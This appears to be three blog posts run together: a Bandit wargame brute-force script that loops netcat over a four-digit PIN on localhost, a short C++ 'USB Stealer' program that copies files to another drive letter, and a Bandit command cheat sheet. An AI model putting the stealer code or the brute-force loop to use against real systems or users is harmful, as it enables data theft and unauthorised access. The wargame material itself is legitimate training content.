[Wargame] Bandit24–BruteForce
#To use “|” in grep, you should use egrep.
#!/bin/bash
for i in {0000..9999};
do
echo "***** $i" | nc localhost 30002 | egrep -v "^I am|^Wrong!|^Exiting"
doneInformation security
[Hack] USB Stealer GetData.cpp
#include<iostream>
#include<fstream>
#include<cstring>
#include<windows.h>
#define MAX_STRING 200
using namespace std;
int main(int argc,char *argv[])
{
ifstream input;
char tempname[MAX_STRING];
char cur_pos[MAX_STRING],target_disk;
GetModuleFileName(NULL,cur_pos,MAX_PATH);
target_disk=cur_pos[0]+1;
for(int i=1;i<argc;i++)
{
input.open(argv[i]);
while(!input.is_open())
{
input.open(argv[i]);
}
input.close();
strcpy(tempname,argv[i]);
tempname[0]=target_disk;
rename(argv[i],tempname);
}
return 0;
}[Wargames] Bandit Notes
Special File Name:
- –
cat ./-
# -- stops parsing params
rm -- -filename- space in between
cat space\ in\ betweenFile Properties:
- find
find / -name file* -size 1033c -redable -user hublee -group mygroup ! -perm /111 2>/dev/null- file
file somefileFile Content:
- sort | uniq
cat somefile | sort | uniq -u- strings
strings somefile | grep '^===*'- base64
base64 -d somefile- md5sum
echo I am user $myname | md5sum | cut -d ' ' -f 1- tr
cat data.txt | tr [a-zA-Z] [n-za-mN-ZA-M]- diff
diff password.new password.oldCompress/Decompress:
gzip -d for *.gzbzip2 -dtar -xvfNetwork:
- ssh
ssh -i privatekey.file user@host cat readme.txtNote:RSA-key file is of the form:
—–BEGIN RSA PRIVATE KEY—–
xxx
—–END RSA PRIVATE KEY—–
- nc
#connect to IP PORT
nc -v 127.0.0.1 30000#create a listening port
nc -l 9000- openssl
openssl s_client -ign_eof -connect localhost:30001- nmap
nmap -p 31000-32000 localhost